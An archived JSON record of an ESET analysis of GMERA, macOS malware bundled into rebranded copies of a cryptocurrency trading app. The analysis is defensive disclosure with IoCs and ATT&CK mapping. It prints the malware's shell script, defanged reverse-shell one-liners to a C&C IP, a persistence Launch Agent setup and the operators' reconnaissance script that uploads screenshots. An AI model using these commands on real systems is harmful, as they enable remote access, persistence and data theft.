{
	"id": "aab16c2f-2ee2-4655-ba24-6be790e754dd",
	"created_at": "2026-04-06T00:14:29.587948Z",
	"updated_at": "2026-04-10T03:21:07.240842Z",
	"deleted_at": null,
	"sha1_hash": "89d86c33316045ec083184e9a21d10eec107d398",
	"title": "Mac cryptocurrency trading application rebranded, bundled with malware",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 2057082,
	"plain_text": "Mac cryptocurrency trading application rebranded, bundled with\r\nmalware\r\nBy Marc-Etienne M.Léveillé\r\nArchived: 2026-04-05 14:33:14 UTC\r\nWe’ve recently discovered websites distributing malicious cryptocurrency trading applications for Mac. This malware is\r\nused to steal information such as browser cookies, cryptocurrency wallets and screen captures. Analyzing the malware\r\nsamples, we quickly found that this was a new campaign of what Trend Micro researchers called GMERA, in an analysis\r\nthey published in September 2019. As in the previous campaigns, the malware reports to a C\u0026C server over HTTP and\r\nconnects remote terminal sessions to another C\u0026C server using a hardcoded IP address. This time, however, not only did the\r\nmalware authors wrap the original, legitimate application to include malware; they also rebranded the Kattana trading\r\napplication with new names and copied its original website. We have seen the following fictitious brandings used in\r\ndifferent campaigns: Cointrazer, Cupatrade, Licatrade and Trezarus. In addition to the analysis of the malware code, ESET\r\nresearchers have also set up honeypots to try to reveal the motivations behind this group of criminals.\r\nDistribution\r\nWe have not yet been able to find exactly where these trojanized applications are promoted. However, in March 2020,\r\nKattana posted a warning suggesting that victims were approached individually to lure them into downloading a trojanized\r\napp. We couldn’t confirm that it was linked to this particular campaign, but it could very well be the case.\r\nFigure 1. Kattana warns about trojanized copies of their software on Twitter\r\nCopycat websites are set up to make the bogus application download look legitimate. 
For a person who doesn’t know\r\nKattana, the websites do look legitimate.\r\nThe download button on the bogus sites is a link to a ZIP archive containing the trojanized application bundle.\r\nAnalysis\r\nhttps://www.welivesecurity.com/2020/07/16/mac-cryptocurrency-trading-application-rebranded-bundled-malware/\r\nPage 1 of 13\n\nMalware analysis in this case is pretty straightforward. We will take the Licatrade sample as the example here. Other\r\nsamples have minor differences, but the ideas and functionalities are essentially the same. Similar analyses of earlier\r\nGMERA campaigns are provided in Trend Micro’s blogpost and in Objective-See’s Mac malware of 2019 report.\r\nFigure 4. Content of the Licatrade application bundle\r\nModification timestamps of the files in the ZIP archive, the date the application was signed, and the Last‑Modified HTTP\r\nheader when we downloaded the archive all show April 15th, 2020. This is highly suggestive that this campaign started on\r\nthat date.\r\nA shell script (run.sh) is included in the resources of the application bundle. This main executable, written in Swift, launches\r\nrun.sh. For some reason, the malware author has duplicated functionality to send a simple report to a C\u0026C server over\r\nHTTP, and to connect to a remote host via TCP providing a remote shell to the attackers, in both the main executable and the\r\nshell script. An additional functionality, in the shell script only, is to set up persistence by installing a Launch Agent.\r\nHere is the full shell script source (ellipsis in long string and defanged):\r\n#! 
/bin/bash\r\nfunction remove_spec_char(){\r\necho \"$1\" | tr -dc '[:alnum:].\\r' | tr '[:upper:]' '[:lower:]'\r\n}\r\nwhoami=\"$(remove_spec_char `whoami`)\"\r\nip=\"$(remove_spec_char `curl -s ipecho.net/plain`)\"\r\nreq=`curl -ks \"http://stepbystepby[.]com/link.php?${whoami}\u0026${ip}\"`\r\nplist_text=\"ZWNobyAnc2R2a21…d2Vpdm5laXZuZSc=\"\r\necho \"$plist_text\" | base64 --decode \u003e \"/tmp/.com.apple.system.plist\"\r\ncp \"/tmp/.com.apple.system.plist\" \"$HOME/Library/LaunchAgents/.com.apple.system.plist\"\r\nlaunchctl load \"/tmp/.com.apple.system.plist\"\r\nscre=`screen -d -m bash -c 'bash -i \u003e/dev/tcp/193.37.212[.]97/25733 0\u003e\u00261'`\r\nIt’s interesting to note that persistence is broken in the Licatrade sample: the content of the resulting Launch Agent file\r\n(.com.apple.system.plist) isn’t in Property List format as launchd expects, but instead is the command line to be executed.\r\nThe decoded content (ellipses in long strings) of the $plist_text variable is:\r\necho 'sdvkmsdfmsd…kxweivneivne'; while :; do sleep 10000; screen -X quit; lsof -ti :25733 | xargs kill -9; screen -d -m\r\nIf run directly, this code would open a reverse shell from the victim machine to an attacker-controlled server, but that fails\r\nhere. Fortunately for the attackers, the last line of the shell script also starts a reverse shell to their server.\r\nThe Cointrazer sample, used in campaigns prior to Licatrade, does not suffer from this issue: the Launch Agent is installed\r\nand successfully starts when the user logs in.\r\nThe various reverse shells used by these malware operators connect to different remote ports depending on how they were\r\nstarted. All connections are unencrypted. 
Here is a list of ports, based on the Licatrade sample.\r\nTCP Port | Where | How\r\n25733 | Licatrade executable | zsh in screen using ztcp\r\n25733 | run.sh | bash in screen using /dev/tcp\r\n25733 | Launch Agent (Not working) | bash in screen using /dev/tcp\r\n25734 | Licatrade executable | zsh using ztcp\r\n25735 | Licatrade executable | bash using /dev/tcp\r\n25736 | Licatrade executable | bash in screen using /dev/tcp\r\n25737 | Licatrade executable | bash in screen using /dev/tcp\r\n25738 | Licatrade executable | zsh in screen using ztcp\r\nHere are some example command lines used:\r\nBash in screen using /dev/tcp:\r\nscreen -d -m bash -c 'bash -i \u003e/dev/tcp/193.37.212[.]97/25733 0\u003e\u00261'\r\nzsh using ztcp:\r\nzsh -c 'zmodload zsh/net/tcp \u0026\u0026 ztcp 193.37.212[.]97 25734 \u0026\u0026 zsh \u003e\u0026$REPLY 2\u003e\u0026$REPLY 0\u003e\u0026$REPLY'\r\nThe rebranded Kattana application is also in the resources of the application bundle. We wanted to see if, besides the change\r\nin name and icon in the application, some other code was changed. Since Kattana asks for credentials for trading platforms\r\nto perform trading, we verified if the input fields of these were tampered with and if credentials were exfiltrated in some\r\nway. Kattana is built with Electron, and Electron apps have an app.asar file, which is an archive containing the JavaScript\r\ncode of the application. We have checked all changes between the original Kattana application and the malicious Licatrade\r\ncopycat and found that only strings and images were changed.\r\nFigure 5. Partial difference between Kattana and Licatrade\r\nLicatrade and its resources were all signed using the same certificate, having the common name field set to Andrey\r\nNovoselov and using developer ID M8WVDT659T. The certificate was issued by Apple on April 6th, 2020. 
It was revoked\r\nthe same day we notified Apple about this malicious application.\r\nFigure 6. Certificate used to sign Licatrade\r\nFigure 7. Licatrade certificate was revoked May 28th, 2020\r\nFor each of the other campaigns we analyzed, a different certificate was used. Both were already revoked by Apple when we\r\nstarted our analyses. See the IoCs section for details about these. It’s interesting to note that in the case of Cointrazer, there\r\nwere only 15 minutes between the moment the certificate was issued by Apple and the malefactors signing their trojanized\r\napplication. This, and the fact that we didn’t find anything else signed with the same key, suggests they got the certificate\r\nexplicitly for that purpose.\r\nInfrastructure\r\nThe malicious Licatrade application was available on the licatrade.com website and its C\u0026C HTTP report server domain is\r\nstepbystepby.com. Both domains were registered using the levistor777@gmail.com email address. Searching for other\r\ndomains registered with that email address reveals what looks like several previous campaigns. 
Here is a list of domains we\r\nfound in samples or registered with that email address.\r\nDomain name | Registration date | Comment\r\nrepbaerray.pw | 2019-02-25 | C\u0026C server for HTTP report of Stockfolio app\r\nmacstockfolio.com | 2019-03-03 | Website distributing the malicious Stockfolio app\r\nlatinumtrade.com | 2019-07-25 | Website distributing the malicious Latinum app\r\ntrezarus.com | 2019-06-03 | Website distributing the malicious Trezarus app\r\ntrezarus.net | 2019-08-07 | Website distributing the malicious Trezarus app\r\ncointrazer.com | 2019-08-18 | Website distributing the malicious Cointrazer app\r\napperdenta.com | 2019-08-18 | Usage unknown\r\nnarudina.com | 2019-09-23 | Usage unknown\r\nnagsrsdfsudinasa.com | 2019-10-09 | C\u0026C server for HTTP report of Cointrazer app\r\ncupatrade.com | 2020-03-28 | Website distributing the malicious Cupatrade app\r\nstepbystepby.com | 2020-04-07 | C\u0026C server for HTTP report of Licatrade app\r\nlicatrade.com | 2020-04-13 | Website distributing the malicious Licatrade app\r\ncreditfinelor.com | 2020-05-29 | Empty page, usage unknown\r\nmaccatreck.com | 2020-05-29 | Some authentication form\r\nBoth the websites and HTTP C\u0026C servers receiving the malware’s first report are hosted behind Cloudflare.\r\nHoneypot interactions\r\nTo learn more about the intentions of this group, we set up honeypots where we monitored all interactions between the\r\nGMERA reverse shell backdoors and the operators of this malware.\r\nWe saw no C\u0026C commands issued via the HTTP C\u0026C server channel; everything happened through the reverse shells.\r\nWhen it first connected, the C\u0026C server sent a small script to gather the username, the macOS version and location (based\r\non external IP address) of the compromised device.\r\n#! /bin/bash\r\nfunction check() {\r\n if [ ! 
-f /private/var/tmp/.i ]; then\r\n write\r\n else\r\n if [ \"$(( $(date +\"%s\") - $(stat -f \"%m\" /private/var/tmp/.i) ))\" -gt \"21600\" ]; then\r\n write\r\n fi\r\n fi\r\n}\r\nfunction write() {\r\n getit=`curl -s ipinfo.io | grep -e country -e city | sed 's/[^a-zA-Z0-9]//g' | sed -e \"s/city//g;s/country//g\"`\r\n echo `whoami` \u003e /private/var/tmp/.i\r\n echo `sw_vers -productVersion` \u003e\u003e /private/var/tmp/.i\r\n echo \"$getit\" \u003e\u003e /private/var/tmp/.i\r\n}\r\ncheck\r\ncat /private/var/tmp/.i\r\nwhich sent something like this to the operators:\r\njeremy\r\n10.13.4\r\nBratislava\r\nSK\r\nThe TCP connection stays open and waits for further commands. In our case, after a while, the operators manually inspected\r\nthe machine. Across several of our honeypots, the commands used to perform that inspection varied. Part of it was just\r\nlisting files across the file system. Sometimes, they would copy-and-paste a base64-encoded script designed to list\r\ninformation to reveal whether the system is a honeypot or actually interesting. The script is decoded, then piped to bash.\r\nFigure 8. 
Packet capture of the operator sending the base64-encoded secondary reconnaissance script\r\nHere is the decoded script:\r\necho \"\"\r\necho \"------ Whoami ------\"\r\nwhoami\r\necho \"------ IP info ------\"\r\ncurl -s ipinfo.io\r\necho \"------ Mac Model ------\"\r\ncurl -s https://support-sp.apple.com/sp/product?cc=$(system_profiler SPHardwareDataType | awk '/Serial/ {print $4}' | cut\r\necho \"------ MacOS Version ------\"\r\nsw_vers -productVersion\r\nsw_vers -productVersion | grep -E \"10.15.*\" \u0026\u0026 echo -e \"\\033[1;31m CATALINA CATALINA CATALINA CATALINA CATALINA CATALINA C\r\nsleep 1\r\necho \"------ MacOS Installed ------\"\r\ndate -r /var/db/.AppleSetupDone\r\necho \"------ Disks ------\"\r\ndf -m\r\necho \"------ Video Output ------\"\r\nsystem_profiler SPDisplaysDataType\r\necho \"------ Wifi Around ------\"\r\n/System/Library/PrivateFrameworks/Apple80211.framework/Versions/Current/Resources/airport -s\r\necho \"------ Virtual Mashine Detector ------\"\r\nioreg -l | grep -e Manufacturer -e 'Vendor Name' | grep -E \"irtual|racle|ware|arallels\" || echo \"Probably not a Virtual Ma\r\necho \"--------------------------------\"\r\necho \"------ Developer Detector ------\"\r\necho \"--------------------------------\"\r\necho \"||| Applications |||\"\r\nls -laht /Applications | grep -E \"Xcode|ublime|ourceTree|Atom|MAMP|TextWrangler|Code|ashcode\" \u0026\u0026 echo \"-|Be Carefull|-\"\r\necho \"||| Short Bash History |||\"\r\ncat ~/.bash_history | head -n 20\r\necho \"------ Desktop Screen ------\"\r\necho \"create screenshot...\"\r\nsw_vers -productVersion | grep -E \"10.15.*\" \u0026 screencapture -t jpg -x /tmp/screen.jpg \u0026\u003e /dev/null\r\nsips -z 500 800 /tmp/screen.jpg \u0026\u003e /dev/null\r\nsips -s formatOptions 50 /tmp/screen.jpg \u0026\u003e /dev/null\r\necho \"uploading...\"\r\ncurl -s -F \"file=@/tmp/screen.jpg\" https://file.io\r\nThis script is actually very similar to the plugin file found in one of the Stockfolio samples analyzed last year. However, in\r\nthe more recent campaigns, they chose to send the reconnaissance script over the network to interesting victims only. It was\r\nalso updated to include some additional information.\r\nFigure 9. Report output that would be seen on an operator's terminal (reconstructed from packet capture)\r\nWe’ll go over each section of the script here:\r\n• It gets the full report about the external IP from ipinfo.io\r\n• It checks the Mac model by using the last 4 digits of the Mac serial number and an HTTP service provided by Apple\r\nto translate it to a friendly name such as “MacBook Pro (Retina, 15-inch, Late 2013)”. Virtual machines likely have\r\ninvalid serial numbers and may not display a model here.\r\n• It outputs the version of macOS installed. There is a rather big red (using ANSI escape sequence), all caps warning\r\nwhen the computer is running macOS Catalina (10.15). We think we understand why and talk about it later.\r\n• It checks when macOS was installed using the modification time of /var/db/.AppleSetupDone.\r\n• It outputs the disk usage and connected monitors’ details.\r\n• It lists available Wi-Fi networks. Honeypots are likely to have Wi-Fi disabled.\r\n• It detects whether the computer is a VMware, Parallels or VirtualBox virtual machine by looking at the vendor strings\r\nof connected devices.\r\n• It checks whether common text editors or IDE applications are installed and warns operators to “Be Carefull” (sic)\r\nbecause this victim could be more computer savvy than usual.\r\n• It gets the first (i.e. oldest) 20 commands from the bash history file.\r\n• Finally, it takes a screenshot, resizes it and uploads it to file.io. 
It checks to see whether the system is running macOS\r\nCatalina before doing so, but an error in the script makes this check useless. The “\u0026” control operator, which starts\r\ncommands in parallel, is used instead of the logical AND (“\u0026\u0026”) operator. This means the screen capture is taken\r\nregardless of the macOS version.\r\nThe fact that a screenshot should not be taken on Catalina and that an obvious warning sign will be displayed on the\r\noperator’s terminal made us wonder why they act differently on the current macOS version. It turns out that Catalina added a\r\nfeature where recording the screen or taking a screenshot must be approved by the user for each application. We tested\r\ntaking a screenshot from the reverse shell on Catalina and ended up with the following warning in our sandbox, which is\r\nrather suspicious considering a trading application has no business doing so.\r\nFigure 10. macOS Catalina warning should the operators try taking a screenshot\r\nShould a compromised system be considered interesting, the exfiltration phase begins. Interesting files are compressed into a\r\nZIP archive and uploaded via HTTP to yet another server, also under the control of the attackers.\r\nFigure 11. Packet capture of an operator using the reverse shell to exfiltrate browser cookies\r\nIt’s funny to note here that the /tmp/h.zip file did not exist. Perhaps they copy-and-pasted some command that was used for\r\nanother victim.\r\nBased on the activity we have witnessed, we conclude that some of the interests of the operators of this malware are:\r\n• Browser information (cookies, history)\r\n• Cryptocurrency wallets\r\n• Screen captures\r\nConclusion\r\nThe numerous campaigns run by this group show how much effort they’ve expended over the last year to compromise Mac\r\nusers doing online trading. 
We still aren’t sure how someone becomes a victim, downloading one of the trojanized\r\napplications, but the hypothesis of the operators directly contacting their targets and socially engineering them into installing\r\nthe malicious application seems the most plausible.\r\nIt is interesting to note how the malware operation is more limited on the most recent version of macOS. We did not see the\r\noperators try to circumvent the limitation surrounding screen captures. Further, we believe that the only way that they could\r\nsee the computer screen on victim machines running Catalina would be to exfiltrate existing screenshots taken by the victim.\r\nThis is a good, real-world example of a mitigation implementation in the operating system that has worked to limit the\r\nactivities of malefactors.\r\nIndicators of Compromise (IoCs)\r\nSamples\r\nSHA-1 | Filename | ESET detection name\r\n2AC42D9A11B67E8AF7B610AA59AADCF1BD5EDE3B | Licatrade.zip | multiple threat\r\n560071EF47FE5417FFF62CB5C0E33B0757D197FA | Licatrade.app/Contents/Resources/run.sh | OSX/Agent.BA\r\n4C688493958CC7CCCFCB246E706184DD7E2049CE | Licatrade.app/Contents/MacOS/Licatrade | OSX/Agent.BA\r\n9C0D839D1F3DA0577A123531E5B4503587D62229 | Cointrazer.zip | multiple threat\r\nDA1FDA04D4149EBF93756BCEF758EB860D0791B0 | Cointrazer.app/Contents/Resources/nytyntrun.sh | OSX/Agent.A\r\nF6CD98A16E8CC2DD3CA1592D9911489BB20D1380 | Cointrazer.app/Contents/MacOS/Cointrazer | OSX/Agent.BA\r\n575A43504F79297CBFA900B55C12DC83C2819B46 | Stockfolio.zip | multiple threat\r\nB8F19B02F9218A8DD803DA1F8650195833057E2C | Stockfolio.app/Contents/MacOS/Stockfoli | OSX/Agent.A\r\nAF65B1A945B517C4D8BAAA706AA19237F036F023 | Stockfolio.app/Contents/Resources/run.sh | OSX/Agent.A\r\nCode signing certificate\r\nApp name | Fingerprint (SHA-1) | Developer identity | Valid from | App signed on | Revoked on\r\nStockfolio | E5D2C7FB4A64EAF444728E5C61F576FF178C5EBF | Levis Toretto (9T4J9V8NV5) | 2018-11-25 | 2019-04-18 | 2019-07-26\r\nCointrazer | 1BC8EA284F9CE5F5F68C68531A410BCC1CE54A55 | Andrei Sobolev (A265HSB92F) | 2019-10-17 | 2019-10-17 | 2020-04-16\r\nLicatrade | BDBD92BFF8E349452B07E5F1D2883678658404A3 | Andrey Novoselov (M8WVDT659T) | 2020-04-06 | 2020-04-15 | 2020-05-28\r\nNetwork\r\nDomain names\r\n• repbaerray.pw\r\n• macstockfolio.com\r\n• latinumtrade.com\r\n• trezarus.com\r\n• trezarus.net\r\n• cointrazer.com\r\n• apperdenta.com\r\n• narudina.com\r\n• nagsrsdfsudinasa.com\r\n• cupatrade.com\r\n• stepbystepby.com\r\n• licatrade.com\r\n• creditfinelor.com\r\n• maccatreck.com\r\nIP addresses\r\n• 85.209.88.123\r\n• 85.217.171.87\r\n• 193.37.214.7\r\n• 193.37.212.97\r\nHost-based indicators\r\nFile paths\r\n• $HOME/Library/LaunchAgents/.com.apple.upd.plist\r\n• $HOME/Library/LaunchAgents/.com.apple.system.plist\r\n• /tmp/.fil.sh\r\n• /tmp/loglog\r\nLaunch Agent labels\r\n• com.apple.apps.upd\r\n• com.apples.apps.upd\r\nMITRE ATT\u0026CK techniques\r\nNote: This table was built using version 6 of the ATT\u0026CK framework.\r\nTactic | ID | Name | Description\r\nExecution | T1204 | User Execution | Victim needs to run the malicious application to be compromised.\r\nExecution | T1059 | Command-Line Interface | GMERA provides reverse bash and zsh shells to its operators.\r\nPersistence | T1159 | Launch Agent | GMERA installs a Launch Agent to maintain persistence.\r\nDefense Evasion | T1116 | Code Signing | All samples of GMERA we have analyzed were signed and used valid, Apple-signed (now revoked), certificates.\r\nCredential Access | T1139 | Bash History | A GMERA reconnaissance script lists the first 20 lines of the .bash_history file.\r\nCredential Access | T1539 | Steal Web Session Cookie | GMERA’s operators steal browser cookies via a reverse shell.\r\nDiscovery | T1083 | File and Directory Discovery | GMERA’s operators list files on the target system via a reverse shell and ls.\r\nDiscovery | T1497 | Virtualization/Sandbox Evasion | A GMERA reconnaissance script checks for devices specific to hypervisors and warns the operators if run in a virtual machine.\r\nDiscovery | T1040 | Network Sniffing | A GMERA reconnaissance script lists Wi-Fi networks available to the compromised Mac using airport -s.\r\nDiscovery | T1082 | System Information Discovery | A GMERA reconnaissance script lists information about the system such as macOS version, attached displays and Mac model.\r\nDiscovery | T1518 | Software Discovery | A GMERA reconnaissance script checks whether developer tools are installed.\r\nCollection | T1005 | Data from Local System | GMERA’s operators use this malware to exfiltrate files from the compromised system.\r\nCollection | T1113 | Screen Capture | GMERA’s operators take screenshots of the compromised system and exfiltrate them through file.io.\r\nCommand and Control | T1043 | Commonly Used Port | Initial reporting from the malware is done using HTTP on its standard TCP port (80).\r\nCommand and Control | T1065 | Uncommonly Used Port | GMERA reverse shells are opened by connecting to C\u0026C server TCP ports in the range 25733 to 25738.\r\nExfiltration | T1048 | Exfiltration Over Alternative Protocol | GMERA exfiltrates files from the reverse shell using HTTP to another attacker-controlled server.\r\nSource: https://www.welivesecurity.com/2020/07/16/mac-cryptocurrency-trading-application-rebranded-bundled-malware/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://www.welivesecurity.com/2020/07/16/mac-cryptocurrency-trading-application-rebranded-bundled-malware/"
	],
	"report_names": [
		"mac-cryptocurrency-trading-application-rebranded-bundled-malware"
	],
	"threat_actors": [],
	"ts_created_at": 1775434469,
	"ts_updated_at": 1775791267,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/89d86c33316045ec083184e9a21d10eec107d398.pdf",
		"text": "https://archive.orkl.eu/89d86c33316045ec083184e9a21d10eec107d398.txt",
		"img": "https://archive.orkl.eu/89d86c33316045ec083184e9a21d10eec107d398.jpg"
	}
}